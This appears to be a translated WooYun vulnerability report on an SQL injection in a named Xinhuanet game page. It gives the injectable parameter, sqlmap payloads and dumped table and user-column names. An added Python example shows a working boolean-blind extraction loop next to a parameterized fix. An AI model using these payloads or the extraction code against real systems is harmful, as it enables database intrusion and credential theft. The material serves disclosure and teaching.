WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2014-10-07: Details sent to the vendor, awaiting vendor handling
2014-10-11: Vendor confirmed; details visible to the vendor only
2014-10-21: Details disclosed to core white hats and relevant domain experts
2014-10-31: Details disclosed to regular white hats
2014-11-10: Details disclosed to intern white hats
2014-11-21: Details disclosed to the public
Xinhuanet: high-risk SQL injection in a major business line, entire database exposed
Injection point in Xinhuanet's game business; the whole database is readable through it:
http://game.news.cn/shouyou/game_details.jsp?gameid=33582
Injectable parameter: gameid. Pointing sqlmap at it directly works, and the application connects to the database as ROOT.
Place: GET
Parameter: gameid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: gameid=33582 AND 7873=7873

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: gameid=33582 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0.11
available databases [4]:
[*] gpfxhw
[*] information_schema
[*] mysql
[*] test

current database: 'gpfxhw'
current user: 'root@localhost'

Database: gpfxhw
[237 tables]
+---------------------------+
| position                  |
| activitydownloadlog       |
| activitypvlog             |
| app_function              |
| app_role                  |
| app_user                  |
| area                      |
| associator                |
| associator_grade          |
| associator_grade_log      |
| backoutinfo               |
| blacklist                 |
| blacklistmobile           |
| brush_mobile              |
| brush_number              |
| brush_number_bak          |
| cardcontent               |
| cardgift                  |
| cardorder                 |
| cityip                    |
| citysort                  |
| clientpvlog               |
| clientuvlog               |
| cloginlog                 |
| collect                   |
| company                   |
| connectionorder           |
| cpcooperateinfo           |
| crandom                   |
| customer_comment          |
| customerdailyrecord       |
| department                |
| dictionary                |
| dictionary_type           |
| downcountday              |
| downcountlog              |
| downcountmonth            |
| downloaddetail            |
| downloadlog               |
| downloadlog_history       |
| editorrecommend           |
| errorcodeinfo             |
| exchangegood              |
| exchangegoodinfo          |
| file_attach               |
| firstactivelog            |
| floworderreport           |
| flowpackorder             |
| flowpackorder_history     |
| flowpackproduct           |
| freeflowgamelog           |
| freeflowgames             |
| freeflowgamesorderway     |
| game_hottag               |
| gamecomment               |
| gamedevelopers            |
| gamefocus                 |
| gamegrade                 |
| gameinfo                  |
| gameintegration           |
| gamelisttype              |
| gamepackage               |
| gamepackageorder          |
| gamepackagesoft           |
| gamepvlog                 |
| gameranklist              |
| gamereport                |
| gamereportorder           |
| gamereportunsubscribe     |
| gamescanresult            |
| gamesdk                   |
| gamesearchdefault         |
| gameseries                |
| gamess                    |
| gamesubject               |
| gamesubjectlog            |
| gamesubjectsoft           |
| gametag                   |
| gametypes                 |
| goodsinfo                 |
| gporder                   |
| gppayment                 |
| groupuserinfo             |
| hotgame                   |
| info                      |
| infoypes                  |
| inputmobile               |
| integrationinfo           |
| iosdowncountlog           |
| iosgameinfo               |
| iosgamepvlog              |
| iosgameuvlog              |
| iplibrary                 |
| keyword                   |
| lnvacbatchlogs            |
| lnvaccheckpricelogs       |
| loginlog                  |
| lotterycount              |
| lotteryinfo               |
| mailbox                   |
| mediacard                 |
| minipayment               |
| minipaymentdetail         |
| mo                        |
| mo_history                |
| mobileimsiid              |
| mobilerandom              |
| mobilesimimsi             |
| mobilesimimsi_20140212    |
| momessage                 |
| mt                        |
| mt_history                |
| mtcheckcountlog           |
| mtcheckcountlog_history   |
| mtids                     |
| mtprocess                 |
| myh5game                  |
| necessary                 |
| newdbsubifacelog          |
| newpaymentreturnlog       |
| newsdkpayment             |
| numtable                  |
| orderfreeflowsdk          |
| orderprop                 |
| orderrelationupdatenotify |
| orderremind               |
| orders                    |
| p_channel                 |
| p_gameactivity            |
| p_relation                |
| p_rhythmmaster            |
| p_scjzds_info             |
| p_scjzds_singup           |
| p_sms                     |
| p_summerwb                |
| pagegameorders            |
| pagegamepvlog             |
| pagekeyword               |
| pagepvchannel             |
| pagepvlog                 |
| pagepvlog_historybak      |
| pagepvlogmonth            |
| pagepvprovincelog         |
| pageuvlog                 |
| paychannel                |
| paymentreturnlog          |
| payrandom                 |
| paysdkcompany             |
| paysdkgame                |
| paysdkgametemp            |
| paysdkparam               |
| pcgamelog                 |
| pcgamepvlog               |
| posterinfo                |
| prepaidcards              |
| promotion                 |
| promotionrecord           |
| promotionrule             |
| province                  |
| proxyinfo                 |
| push_channel              |
| push_channelall           |
| push_channeldetail        |
| pushinfo                  |
| querygameinfo             |
| question                  |
| qy_medal                  |
| qy_news                   |
| random                    |
| recommend                 |
| registertype              |
| reservationmobile         |
| role_fun                  |
| scoreexchange             |
| scorelog                  |
| sdkchannel                |
| sdkchanneltype            |
| sdkchecklogs              |
| sdkcooperation            |
| sdkcooprel                |
| sdkincome                 |
| sdkincome_province        |
| sdkincomesmsdetail        |
| sdkincomesmsdetail_old    |
| sdkpayment                |
| sdkpayment_history        |
| sdkpaymentlog             |
| sdksmslog                 |
| sdkversion                |
| seriesbrand               |
| sgipheart                 |
| sharelog                  |
| sharesmslog               |
| sign                      |
| signintegration           |
| sjinfo                    |
| smsbykflog                |
| smscompanyinfo            |
| smscporder                |
| smscppayment              |
| smscprelation             |
| smskycallbacklog          |
| smskylog                  |
| smskymolog                |
| smskypaymentlog           |
| smslogs                   |
| smsorderconf              |
| smsorderconfbatch         |
| smspayerrorlogs           |
| smspayerrorlogs_history   |
| smsproductinfo            |
| smsreceive                |
| smsspecialnumber          |
| smszsmolog                |
| smszspaymentlog           |
| softgood                  |
| swpayment                 |
| swpaymentdetail           |
| swtemp                    |
| swtempdel                 |
| sysinterfacecfg           |
| sysparam                  |
| system_param              |
| systeminfo                |
| taxmanagement             |
| thirdpayment              |
| thirdpaymentdetail        |
| timertaskresult           |
| unicomsmslogs             |
| useintegral               |
| user_role                 |
| usermessage               |
| usertable                 |
| vote                      |
| winprizeinfo              |
| wochannel                 |
| wogameinfo                |
+---------------------------+

Database: gpfxhw
Table: app_user
[26 columns]
+---------------+--------------+
| Column        | Type         |
+---------------+--------------+
| accessionTime | datetime     |
| addres        | varchar(500) |
| channelid     | varchar(3)   |
| dep_id        | bigint(20)   |
| developerid   | varchar(20)  |
| developername | varchar(50)  |
| edu_id        | bigint(20)   |
| email         | varchar(100) |
| emailPassword | varchar(100) |
| fax           | varchar(100) |
| file_id       | bigint(20)   |
| fullName      | varchar(100) |
| leftFlag      | int(11)      |
| mobile        | varchar(100) |
| password      | varchar(100) |
| phone         | varchar(100) |
| pos_id        | bigint(20)   |
| province      | varchar(20)  |
| remark        | varchar(200) |
| sex           | int(11)      |
| status        | int(11)      |
| tellimit      | int(11)      |
| tralimit      | int(11)      |
| userId        | bigint(20)   |
| userName      | varchar(100) |
| zip           | varchar(100) |
+---------------+--------------+
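The two sqlmap payloads above (gameid=33582 AND 7873=7873 for the boolean oracle, AND SLEEP(5) for the timing one) work because gameid is spliced into the SQL text as a string. The following is an added example, not code from the report or from the game.news.cn application: it rebuilds the anti-pattern and its parameterized fix on an in-memory SQLite database that stands in for the MySQL gpfxhw schema (table and column names borrowed from the sqlmap output, row contents constructed), then runs the same boolean-based blind technique sqlmap used to pull a value out one character at a time. Everything in the block, including the handler names and sample rows, is assumed for the demonstration. SQLite has no SLEEP(), so only the boolean oracle is shown; the time-based variant differs only in which side effect is observed.

```python
import sqlite3

# Constructed stand-in for the gpfxhw database. The real target was MySQL behind
# a JSP page; SQLite is used so the example runs offline with no server.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE gameinfo (gameid INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO gameinfo VALUES (33582, 'Sample Game');
        CREATE TABLE app_user (userId INTEGER, userName TEXT, password TEXT);
        INSERT INTO app_user VALUES (1, 'admin', 'secret');
    """)
    return conn


def game_details_vulnerable(conn, gameid):
    """The anti-pattern sqlmap found: the query string is built by concatenation,
    so whatever the client puts in gameid becomes part of the SQL."""
    sql = "SELECT name FROM gameinfo WHERE gameid=" + gameid
    return conn.execute(sql).fetchone()


def game_details_fixed(conn, gameid):
    """Hardened version: enforce the expected type, then bind the value as a
    parameter so the database never parses it as SQL."""
    try:
        gid = int(gameid)
    except ValueError:
        return None          # reject non-numeric input instead of guessing
    return conn.execute("SELECT name FROM gameinfo WHERE gameid=?", (gid,)).fetchone()


def oracle(handler, conn, condition):
    """Boolean-based blind oracle: does the page still render the game record
    when `condition` is ANDed onto the legitimate gameid?"""
    return handler(conn, f"33582 AND ({condition})") is not None


def detect_boolean_blind(handler, conn):
    """sqlmap's detection step: a true tautology and a false one must produce
    different responses for the parameter to be injectable."""
    return oracle(handler, conn, "7873=7873") and not oracle(handler, conn, "7873=7874")


def extract_string(handler, conn, subquery, max_len=32):
    """Pull the result of `subquery` out through the oracle, one character at a
    time, binary-searching each code point (8 requests per character)."""
    result = ""
    for pos in range(1, max_len + 1):
        # stop when the string has no character at this position
        if not oracle(handler, conn, f"length(({subquery}))>={pos}"):
            break
        lo, hi = 0, 255
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(handler, conn, f"unicode(substr(({subquery}),{pos},1))>{mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


if __name__ == "__main__":
    db = make_db()
    target = "SELECT password FROM app_user WHERE userName='admin'"
    for name, handler in (("vulnerable", game_details_vulnerable),
                          ("fixed", game_details_fixed)):
        print(name, "injectable:", detect_boolean_blind(handler, db),
              "extracted:", repr(extract_string(handler, db, target)))
```

Against the concatenating handler the oracle distinguishes the two tautologies and the loop recovers the admin password from app_user; against the parameterized handler the payload never reaches the SQL parser, so both probes return the same (empty) result and nothing can be extracted. The same int() check also stops the SLEEP(5) payload, since it is rejected before any query runs. Note that the fix is the parameter binding, not escaping: the report's root@localhost finding means a separate change, a least-privilege database account for the web application, is still needed even after the injection is closed.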
As above.
Fix it yourselves.
Severity: High
Vulnerability rank: 10
Confirmed: 2014-10-11 17:13
None yet.